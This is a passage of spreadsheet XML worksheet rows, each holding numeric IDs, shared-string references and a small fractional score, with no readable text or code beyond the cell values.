    <row r="11852" ht="15.75" customHeight="1">
      <c r="A11852" s="1">
        <v>5421.0</v>
      </c>
      <c r="B11852" s="2">
        <v>4.556116E7</v>
      </c>
      <c r="C11852" s="2" t="s">
        <v>11378</v>
      </c>
      <c r="D11852" s="2">
        <v>1.0</v>
      </c>
      <c r="E11852" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11852" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11853" ht="15.75" customHeight="1">
      <c r="A11853" s="1">
        <v>5632.0</v>
      </c>
      <c r="B11853" s="2">
        <v>4.6231727E7</v>
      </c>
      <c r="C11853" s="2" t="s">
        <v>11379</v>
      </c>
      <c r="D11853" s="2">
        <v>1.0</v>
      </c>
      <c r="E11853" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11853" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11854" ht="15.75" customHeight="1">
      <c r="A11854" s="1">
        <v>6276.0</v>
      </c>
      <c r="B11854" s="2">
        <v>4.8144472E7</v>
      </c>
      <c r="C11854" s="2" t="s">
        <v>11380</v>
      </c>
      <c r="D11854" s="2">
        <v>1.0</v>
      </c>
      <c r="E11854" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11854" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11855" ht="15.75" customHeight="1">
      <c r="A11855" s="1">
        <v>7119.0</v>
      </c>
      <c r="B11855" s="2">
        <v>5.0394162E7</v>
      </c>
      <c r="C11855" s="2" t="s">
        <v>11381</v>
      </c>
      <c r="D11855" s="2">
        <v>1.0</v>
      </c>
      <c r="E11855" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11855" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11856" ht="15.75" customHeight="1">
      <c r="A11856" s="1">
        <v>7264.0</v>
      </c>
      <c r="B11856" s="2">
        <v>5.0766196E7</v>
      </c>
      <c r="C11856" s="2" t="s">
        <v>11382</v>
      </c>
      <c r="D11856" s="2">
        <v>1.0</v>
      </c>
      <c r="E11856" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11856" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11857" ht="15.75" customHeight="1">
      <c r="A11857" s="1">
        <v>7570.0</v>
      </c>
      <c r="B11857" s="2">
        <v>5.1560342E7</v>
      </c>
      <c r="C11857" s="2" t="s">
        <v>11383</v>
      </c>
      <c r="D11857" s="2">
        <v>1.0</v>
      </c>
      <c r="E11857" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11857" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11858" ht="15.75" customHeight="1">
      <c r="A11858" s="1">
        <v>8544.0</v>
      </c>
      <c r="B11858" s="2">
        <v>5.4138753E7</v>
      </c>
      <c r="C11858" s="2" t="s">
        <v>11384</v>
      </c>
      <c r="D11858" s="2">
        <v>1.0</v>
      </c>
      <c r="E11858" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11858" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11859" ht="15.75" customHeight="1">
      <c r="A11859" s="1">
        <v>8681.0</v>
      </c>
      <c r="B11859" s="2">
        <v>5.440523E7</v>
      </c>
      <c r="C11859" s="2" t="s">
        <v>11385</v>
      </c>
      <c r="D11859" s="2">
        <v>1.0</v>
      </c>
      <c r="E11859" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11859" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11860" ht="15.75" customHeight="1">
      <c r="A11860" s="1">
        <v>8717.0</v>
      </c>
      <c r="B11860" s="2">
        <v>5.4472713E7</v>
      </c>
      <c r="C11860" s="2" t="s">
        <v>11386</v>
      </c>
      <c r="D11860" s="2">
        <v>1.0</v>
      </c>
      <c r="E11860" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11860" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11861" ht="15.75" customHeight="1">
      <c r="A11861" s="1">
        <v>9561.0</v>
      </c>
      <c r="B11861" s="2">
        <v>5.6047749E7</v>
      </c>
      <c r="C11861" s="2" t="s">
        <v>11387</v>
      </c>
      <c r="D11861" s="2">
        <v>1.0</v>
      </c>
      <c r="E11861" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11861" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11862" ht="15.75" customHeight="1">
      <c r="A11862" s="1">
        <v>9834.0</v>
      </c>
      <c r="B11862" s="2">
        <v>5.6644622E7</v>
      </c>
      <c r="C11862" s="2" t="s">
        <v>11388</v>
      </c>
      <c r="D11862" s="2">
        <v>1.0</v>
      </c>
      <c r="E11862" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11862" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11863" ht="15.75" customHeight="1">
      <c r="A11863" s="1">
        <v>10055.0</v>
      </c>
      <c r="B11863" s="2">
        <v>5.7119167E7</v>
      </c>
      <c r="C11863" s="2" t="s">
        <v>11389</v>
      </c>
      <c r="D11863" s="2">
        <v>1.0</v>
      </c>
      <c r="E11863" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11863" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11864" ht="15.75" customHeight="1">
      <c r="A11864" s="1">
        <v>11299.0</v>
      </c>
      <c r="B11864" s="2">
        <v>2.096739E7</v>
      </c>
      <c r="C11864" s="2" t="s">
        <v>11390</v>
      </c>
      <c r="D11864" s="2">
        <v>1.0</v>
      </c>
      <c r="E11864" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11864" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11865" ht="15.75" customHeight="1">
      <c r="A11865" s="1">
        <v>11370.0</v>
      </c>
      <c r="B11865" s="2">
        <v>2.1406476E7</v>
      </c>
      <c r="C11865" s="2" t="s">
        <v>11391</v>
      </c>
      <c r="D11865" s="2">
        <v>1.0</v>
      </c>
      <c r="E11865" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11865" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11866" ht="15.75" customHeight="1">
      <c r="A11866" s="1">
        <v>11926.0</v>
      </c>
      <c r="B11866" s="2">
        <v>2.5396048E7</v>
      </c>
      <c r="C11866" s="2" t="s">
        <v>11392</v>
      </c>
      <c r="D11866" s="2">
        <v>1.0</v>
      </c>
      <c r="E11866" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11866" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11867" ht="15.75" customHeight="1">
      <c r="A11867" s="1">
        <v>14231.0</v>
      </c>
      <c r="B11867" s="2">
        <v>3.8300168E7</v>
      </c>
      <c r="C11867" s="2" t="s">
        <v>11393</v>
      </c>
      <c r="D11867" s="2">
        <v>1.0</v>
      </c>
      <c r="E11867" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11867" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11868" ht="15.75" customHeight="1">
      <c r="A11868" s="1">
        <v>14301.0</v>
      </c>
      <c r="B11868" s="2">
        <v>3.859838E7</v>
      </c>
      <c r="C11868" s="2" t="s">
        <v>11394</v>
      </c>
      <c r="D11868" s="2">
        <v>1.0</v>
      </c>
      <c r="E11868" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11868" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11869" ht="15.75" customHeight="1">
      <c r="A11869" s="1">
        <v>14302.0</v>
      </c>
      <c r="B11869" s="2">
        <v>3.859838E7</v>
      </c>
      <c r="C11869" s="2" t="s">
        <v>11395</v>
      </c>
      <c r="D11869" s="2">
        <v>1.0</v>
      </c>
      <c r="E11869" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11869" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11870" ht="15.75" customHeight="1">
      <c r="A11870" s="1">
        <v>15085.0</v>
      </c>
      <c r="B11870" s="2">
        <v>4.1770492E7</v>
      </c>
      <c r="C11870" s="2" t="s">
        <v>11396</v>
      </c>
      <c r="D11870" s="2">
        <v>1.0</v>
      </c>
      <c r="E11870" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11870" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11871" ht="15.75" customHeight="1">
      <c r="A11871" s="1">
        <v>15174.0</v>
      </c>
      <c r="B11871" s="2">
        <v>4.2011619E7</v>
      </c>
      <c r="C11871" s="2" t="s">
        <v>11397</v>
      </c>
      <c r="D11871" s="2">
        <v>1.0</v>
      </c>
      <c r="E11871" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11871" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11872" ht="15.75" customHeight="1">
      <c r="A11872" s="1">
        <v>15307.0</v>
      </c>
      <c r="B11872" s="2">
        <v>4.2486636E7</v>
      </c>
      <c r="C11872" s="2" t="s">
        <v>11398</v>
      </c>
      <c r="D11872" s="2">
        <v>1.0</v>
      </c>
      <c r="E11872" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11872" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11873" ht="15.75" customHeight="1">
      <c r="A11873" s="1">
        <v>15382.0</v>
      </c>
      <c r="B11873" s="2">
        <v>4.2776495E7</v>
      </c>
      <c r="C11873" s="2" t="s">
        <v>11399</v>
      </c>
      <c r="D11873" s="2">
        <v>1.0</v>
      </c>
      <c r="E11873" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11873" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11874" ht="15.75" customHeight="1">
      <c r="A11874" s="1">
        <v>15781.0</v>
      </c>
      <c r="B11874" s="2">
        <v>4.4196439E7</v>
      </c>
      <c r="C11874" s="2" t="s">
        <v>11400</v>
      </c>
      <c r="D11874" s="2">
        <v>1.0</v>
      </c>
      <c r="E11874" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11874" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11875" ht="15.75" customHeight="1">
      <c r="A11875" s="1">
        <v>16012.0</v>
      </c>
      <c r="B11875" s="2">
        <v>4.5017154E7</v>
      </c>
      <c r="C11875" s="2" t="s">
        <v>11401</v>
      </c>
      <c r="D11875" s="2">
        <v>1.0</v>
      </c>
      <c r="E11875" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11875" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11876" ht="15.75" customHeight="1">
      <c r="A11876" s="1">
        <v>16112.0</v>
      </c>
      <c r="B11876" s="2">
        <v>4.5400963E7</v>
      </c>
      <c r="C11876" s="2" t="s">
        <v>11402</v>
      </c>
      <c r="D11876" s="2">
        <v>1.0</v>
      </c>
      <c r="E11876" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11876" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11877" ht="15.75" customHeight="1">
      <c r="A11877" s="1">
        <v>16559.0</v>
      </c>
      <c r="B11877" s="2">
        <v>4.6839225E7</v>
      </c>
      <c r="C11877" s="2" t="s">
        <v>11403</v>
      </c>
      <c r="D11877" s="2">
        <v>1.0</v>
      </c>
      <c r="E11877" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11877" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11878" ht="15.75" customHeight="1">
      <c r="A11878" s="1">
        <v>16721.0</v>
      </c>
      <c r="B11878" s="2">
        <v>4.7465326E7</v>
      </c>
      <c r="C11878" s="2" t="s">
        <v>11404</v>
      </c>
      <c r="D11878" s="2">
        <v>1.0</v>
      </c>
      <c r="E11878" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11878" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11879" ht="15.75" customHeight="1">
      <c r="A11879" s="1">
        <v>16811.0</v>
      </c>
      <c r="B11879" s="2">
        <v>4.781841E7</v>
      </c>
      <c r="C11879" s="2" t="s">
        <v>11405</v>
      </c>
      <c r="D11879" s="2">
        <v>1.0</v>
      </c>
      <c r="E11879" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11879" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11880" ht="15.75" customHeight="1">
      <c r="A11880" s="1">
        <v>18212.0</v>
      </c>
      <c r="B11880" s="2">
        <v>5.2066782E7</v>
      </c>
      <c r="C11880" s="2" t="s">
        <v>11406</v>
      </c>
      <c r="D11880" s="2">
        <v>1.0</v>
      </c>
      <c r="E11880" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11880" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11881" ht="15.75" customHeight="1">
      <c r="A11881" s="1">
        <v>18273.0</v>
      </c>
      <c r="B11881" s="2">
        <v>5.2225363E7</v>
      </c>
      <c r="C11881" s="2" t="s">
        <v>11407</v>
      </c>
      <c r="D11881" s="2">
        <v>1.0</v>
      </c>
      <c r="E11881" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11881" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11882" ht="15.75" customHeight="1">
      <c r="A11882" s="1">
        <v>18492.0</v>
      </c>
      <c r="B11882" s="2">
        <v>5.2912396E7</v>
      </c>
      <c r="C11882" s="2" t="s">
        <v>11408</v>
      </c>
      <c r="D11882" s="2">
        <v>1.0</v>
      </c>
      <c r="E11882" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11882" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11883" ht="15.75" customHeight="1">
      <c r="A11883" s="1">
        <v>18615.0</v>
      </c>
      <c r="B11883" s="2">
        <v>5.3336984E7</v>
      </c>
      <c r="C11883" s="2" t="s">
        <v>11409</v>
      </c>
      <c r="D11883" s="2">
        <v>1.0</v>
      </c>
      <c r="E11883" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11883" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11884" ht="15.75" customHeight="1">
      <c r="A11884" s="1">
        <v>19159.0</v>
      </c>
      <c r="B11884" s="2">
        <v>5.4898307E7</v>
      </c>
      <c r="C11884" s="2" t="s">
        <v>11410</v>
      </c>
      <c r="D11884" s="2">
        <v>1.0</v>
      </c>
      <c r="E11884" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11884" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11885" ht="15.75" customHeight="1">
      <c r="A11885" s="1">
        <v>19284.0</v>
      </c>
      <c r="B11885" s="2">
        <v>5.5169394E7</v>
      </c>
      <c r="C11885" s="2" t="s">
        <v>11411</v>
      </c>
      <c r="D11885" s="2">
        <v>1.0</v>
      </c>
      <c r="E11885" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11885" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11886" ht="15.75" customHeight="1">
      <c r="A11886" s="1">
        <v>19434.0</v>
      </c>
      <c r="B11886" s="2">
        <v>5.5702898E7</v>
      </c>
      <c r="C11886" s="2" t="s">
        <v>11412</v>
      </c>
      <c r="D11886" s="2">
        <v>1.0</v>
      </c>
      <c r="E11886" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11886" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11887" ht="15.75" customHeight="1">
      <c r="A11887" s="1">
        <v>19602.0</v>
      </c>
      <c r="B11887" s="2">
        <v>5.6182858E7</v>
      </c>
      <c r="C11887" s="2" t="s">
        <v>11413</v>
      </c>
      <c r="D11887" s="2">
        <v>1.0</v>
      </c>
      <c r="E11887" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11887" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11888" ht="15.75" customHeight="1">
      <c r="A11888" s="1">
        <v>19623.0</v>
      </c>
      <c r="B11888" s="2">
        <v>5.6246491E7</v>
      </c>
      <c r="C11888" s="2" t="s">
        <v>11414</v>
      </c>
      <c r="D11888" s="2">
        <v>1.0</v>
      </c>
      <c r="E11888" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11888" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11889" ht="15.75" customHeight="1">
      <c r="A11889" s="1">
        <v>19735.0</v>
      </c>
      <c r="B11889" s="2">
        <v>5.667236E7</v>
      </c>
      <c r="C11889" s="2" t="s">
        <v>11415</v>
      </c>
      <c r="D11889" s="2">
        <v>1.0</v>
      </c>
      <c r="E11889" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11889" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11890" ht="15.75" customHeight="1">
      <c r="A11890" s="1">
        <v>19808.0</v>
      </c>
      <c r="B11890" s="2">
        <v>5.6905467E7</v>
      </c>
      <c r="C11890" s="2" t="s">
        <v>11416</v>
      </c>
      <c r="D11890" s="2">
        <v>1.0</v>
      </c>
      <c r="E11890" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11890" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11891" ht="15.75" customHeight="1">
      <c r="A11891" s="1">
        <v>19969.0</v>
      </c>
      <c r="B11891" s="2">
        <v>5.7559587E7</v>
      </c>
      <c r="C11891" s="2" t="s">
        <v>11417</v>
      </c>
      <c r="D11891" s="2">
        <v>1.0</v>
      </c>
      <c r="E11891" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11891" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11892" ht="15.75" customHeight="1">
      <c r="A11892" s="1">
        <v>20601.0</v>
      </c>
      <c r="B11892" s="2">
        <v>1.3874601E7</v>
      </c>
      <c r="C11892" s="2" t="s">
        <v>11418</v>
      </c>
      <c r="D11892" s="2">
        <v>1.0</v>
      </c>
      <c r="E11892" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11892" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11893" ht="15.75" customHeight="1">
      <c r="A11893" s="1">
        <v>21580.0</v>
      </c>
      <c r="B11893" s="2">
        <v>2.3870517E7</v>
      </c>
      <c r="C11893" s="2" t="s">
        <v>11419</v>
      </c>
      <c r="D11893" s="2">
        <v>1.0</v>
      </c>
      <c r="E11893" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11893" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11894" ht="15.75" customHeight="1">
      <c r="A11894" s="1">
        <v>24843.0</v>
      </c>
      <c r="B11894" s="2">
        <v>1.2183244E7</v>
      </c>
      <c r="C11894" s="2" t="s">
        <v>11420</v>
      </c>
      <c r="D11894" s="2">
        <v>1.0</v>
      </c>
      <c r="E11894" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11894" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11895" ht="15.75" customHeight="1">
      <c r="A11895" s="1">
        <v>25376.0</v>
      </c>
      <c r="B11895" s="2">
        <v>1.363658E7</v>
      </c>
      <c r="C11895" s="2" t="s">
        <v>11421</v>
      </c>
      <c r="D11895" s="2">
        <v>1.0</v>
      </c>
      <c r="E11895" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11895" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11896" ht="15.75" customHeight="1">
      <c r="A11896" s="1">
        <v>25437.0</v>
      </c>
      <c r="B11896" s="2">
        <v>1.38746E7</v>
      </c>
      <c r="C11896" s="2" t="s">
        <v>11418</v>
      </c>
      <c r="D11896" s="2">
        <v>1.0</v>
      </c>
      <c r="E11896" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11896" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11897" ht="15.75" customHeight="1">
      <c r="A11897" s="1">
        <v>26402.0</v>
      </c>
      <c r="B11897" s="2">
        <v>1.7023586E7</v>
      </c>
      <c r="C11897" s="2" t="s">
        <v>11422</v>
      </c>
      <c r="D11897" s="2">
        <v>1.0</v>
      </c>
      <c r="E11897" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11897" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11898" ht="15.75" customHeight="1">
      <c r="A11898" s="1">
        <v>26914.0</v>
      </c>
      <c r="B11898" s="2">
        <v>1.9359456E7</v>
      </c>
      <c r="C11898" s="2" t="s">
        <v>11423</v>
      </c>
      <c r="D11898" s="2">
        <v>1.0</v>
      </c>
      <c r="E11898" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11898" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11899" ht="15.75" customHeight="1">
      <c r="A11899" s="1">
        <v>31013.0</v>
      </c>
      <c r="B11899" s="2">
        <v>4771280.0</v>
      </c>
      <c r="C11899" s="2" t="s">
        <v>11424</v>
      </c>
      <c r="D11899" s="2">
        <v>1.0</v>
      </c>
      <c r="E11899" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11899" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11900" ht="15.75" customHeight="1">
      <c r="A11900" s="1">
        <v>31478.0</v>
      </c>
      <c r="B11900" s="2">
        <v>5048683.0</v>
      </c>
      <c r="C11900" s="2" t="s">
        <v>11425</v>
      </c>
      <c r="D11900" s="2">
        <v>1.0</v>
      </c>
      <c r="E11900" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11900" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11901" ht="15.75" customHeight="1">
      <c r="A11901" s="1">
        <v>33612.0</v>
      </c>
      <c r="B11901" s="2">
        <v>8342153.0</v>
      </c>
      <c r="C11901" s="2" t="s">
        <v>11426</v>
      </c>
      <c r="D11901" s="2">
        <v>1.0</v>
      </c>
      <c r="E11901" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11901" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="11902" ht="15.75" customHeight="1">
      <c r="A11902" s="1">
        <v>12533.0</v>
      </c>
      <c r="B11902" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C11902" s="2" t="s">
        <v>11427</v>
      </c>
      <c r="D11902" s="2">
        <v>1.0</v>
      </c>
      <c r="E11902" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11902" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="11903" ht="15.75" customHeight="1">
      <c r="A11903" s="1">
        <v>4896.0</v>
      </c>
      <c r="B11903" s="2">
        <v>4.3881249E7</v>
      </c>
      <c r="C11903" s="2" t="s">
        <v>11428</v>
      </c>
      <c r="D11903" s="2">
        <v>1.0</v>
      </c>
      <c r="E11903" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11903" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="11904" ht="15.75" customHeight="1">
      <c r="A11904" s="1">
        <v>5684.0</v>
      </c>
      <c r="B11904" s="2">
        <v>4.6415639E7</v>
      </c>
      <c r="C11904" s="2" t="s">
        <v>11429</v>
      </c>
      <c r="D11904" s="2">
        <v>1.0</v>
      </c>
      <c r="E11904" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11904" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="11905" ht="15.75" customHeight="1">
      <c r="A11905" s="1">
        <v>11562.0</v>
      </c>
      <c r="B11905" s="2">
        <v>2.2724897E7</v>
      </c>
      <c r="C11905" s="2" t="s">
        <v>11430</v>
      </c>
      <c r="D11905" s="2">
        <v>1.0</v>
      </c>
      <c r="E11905" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11905" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="11906" ht="15.75" customHeight="1">
      <c r="A11906" s="1">
        <v>14999.0</v>
      </c>
      <c r="B11906" s="2">
        <v>4.1449362E7</v>
      </c>
      <c r="C11906" s="2" t="s">
        <v>11431</v>
      </c>
      <c r="D11906" s="2">
        <v>1.0</v>
      </c>
      <c r="E11906" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11906" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="11907" ht="15.75" customHeight="1">
      <c r="A11907" s="1">
        <v>16931.0</v>
      </c>
      <c r="B11907" s="2">
        <v>4.8163808E7</v>
      </c>
      <c r="C11907" s="2" t="s">
        <v>11432</v>
      </c>
      <c r="D11907" s="2">
        <v>1.0</v>
      </c>
      <c r="E11907" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11907" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="11908" ht="15.75" customHeight="1">
      <c r="A11908" s="1">
        <v>21344.0</v>
      </c>
      <c r="B11908" s="2">
        <v>2.1194117E7</v>
      </c>
      <c r="C11908" s="2" t="s">
        <v>11433</v>
      </c>
      <c r="D11908" s="2">
        <v>1.0</v>
      </c>
      <c r="E11908" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11908" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="11909" ht="15.75" customHeight="1">
      <c r="A11909" s="1">
        <v>24080.0</v>
      </c>
      <c r="B11909" s="2">
        <v>9701814.0</v>
      </c>
      <c r="C11909" s="2" t="s">
        <v>11434</v>
      </c>
      <c r="D11909" s="2">
        <v>1.0</v>
      </c>
      <c r="E11909" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11909" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="11910" ht="15.75" customHeight="1">
      <c r="A11910" s="1">
        <v>5672.0</v>
      </c>
      <c r="B11910" s="2">
        <v>4.634607E7</v>
      </c>
      <c r="C11910" s="2" t="s">
        <v>11435</v>
      </c>
      <c r="D11910" s="2">
        <v>1.0</v>
      </c>
      <c r="E11910" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11910" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="11911" ht="15.75" customHeight="1">
      <c r="A11911" s="1">
        <v>17373.0</v>
      </c>
      <c r="B11911" s="2">
        <v>4.9510656E7</v>
      </c>
      <c r="C11911" s="2" t="s">
        <v>11436</v>
      </c>
      <c r="D11911" s="2">
        <v>1.0</v>
      </c>
      <c r="E11911" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11911" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="11912" ht="15.75" customHeight="1">
      <c r="A11912" s="1">
        <v>4339.0</v>
      </c>
      <c r="B11912" s="2">
        <v>4.2065087E7</v>
      </c>
      <c r="C11912" s="2" t="s">
        <v>11437</v>
      </c>
      <c r="D11912" s="2">
        <v>1.0</v>
      </c>
      <c r="E11912" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11912" s="2">
        <v>0.1273946360153256</v>
      </c>
    </row>
    <row r="11913" ht="15.75" customHeight="1">
      <c r="A11913" s="1">
        <v>19330.0</v>
      </c>
      <c r="B11913" s="2">
        <v>5.5323558E7</v>
      </c>
      <c r="C11913" s="2" t="s">
        <v>11438</v>
      </c>
      <c r="D11913" s="2">
        <v>1.0</v>
      </c>
      <c r="E11913" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11913" s="2">
        <v>0.1273148148148149</v>
      </c>
    </row>
    <row r="11914" ht="15.75" customHeight="1">
      <c r="A11914" s="1">
        <v>6594.0</v>
      </c>
      <c r="B11914" s="2">
        <v>4.8996671E7</v>
      </c>
      <c r="C11914" s="2" t="s">
        <v>11439</v>
      </c>
      <c r="D11914" s="2">
        <v>1.0</v>
      </c>
      <c r="E11914" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11914" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="11915" ht="15.75" customHeight="1">
      <c r="A11915" s="1">
        <v>13790.0</v>
      </c>
      <c r="B11915" s="2">
        <v>3.6579239E7</v>
      </c>
      <c r="C11915" s="2" t="s">
        <v>11440</v>
      </c>
      <c r="D11915" s="2">
        <v>1.0</v>
      </c>
      <c r="E11915" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11915" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="11916" ht="15.75" customHeight="1">
      <c r="A11916" s="1">
        <v>32890.0</v>
      </c>
      <c r="B11916" s="2">
        <v>6376162.0</v>
      </c>
      <c r="C11916" s="2" t="s">
        <v>11441</v>
      </c>
      <c r="D11916" s="2">
        <v>1.0</v>
      </c>
      <c r="E11916" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11916" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="11917" ht="15.75" customHeight="1">
      <c r="A11917" s="1">
        <v>29931.0</v>
      </c>
      <c r="B11917" s="2">
        <v>3607052.0</v>
      </c>
      <c r="C11917" s="2" t="s">
        <v>11442</v>
      </c>
      <c r="D11917" s="2">
        <v>1.0</v>
      </c>
      <c r="E11917" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11917" s="2">
        <v>0.1268768768768769</v>
      </c>
    </row>
    <row r="11918" ht="15.75" customHeight="1">
      <c r="A11918" s="1">
        <v>9656.0</v>
      </c>
      <c r="B11918" s="2">
        <v>5.6290353E7</v>
      </c>
      <c r="C11918" s="2" t="s">
        <v>11443</v>
      </c>
      <c r="D11918" s="2">
        <v>1.0</v>
      </c>
      <c r="E11918" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11918" s="2">
        <v>0.1268656716417911</v>
      </c>
    </row>
